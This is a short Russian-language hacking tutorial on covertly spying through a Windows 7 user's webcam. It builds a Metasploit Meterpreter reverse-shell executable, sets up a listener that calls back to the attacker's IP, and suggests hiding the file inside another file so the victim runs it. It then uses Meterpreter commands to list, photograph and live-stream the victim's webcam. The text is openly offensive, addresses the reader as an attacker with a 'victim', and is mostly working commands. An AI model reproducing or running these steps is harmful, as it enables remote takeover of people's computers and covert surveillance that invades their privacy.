Поговорим друзья о уязвимости Windows 7 и взлома web камеры способом, доступным любому. главное знать только IP адрес вашей жертвы.
И так начнем:
Для начала на нужно, создать вредоносный исполняемый файл run_me.exe, который в BlackTrack(сейчас Kali Linux) создается так, как показано ниже:
Код:
# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
LHOST=192.168.1.5 - IP-адрес атакующего
LPORT=4444 - порт атакующего
Запускаем Metasploit:
Код:
# msfconsole
Далее вводим команды:
Код:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit
Теперь нам нужно, чтоб пользователь запустил файл run_me.exe. Как этого добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл.
После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем)
Сначала посмотрим, есть ли вообще у него web-камера?
Код:
meterpreter > webcam_list
Результат: 1:Logitech Webcan 120
Если повезло делаем снимок:
Код:
meterpreter > webcam_snap
Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:
Код:
meterpreter > run webcam -p /var/www
После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:
Код:
/var/www/webcam.html
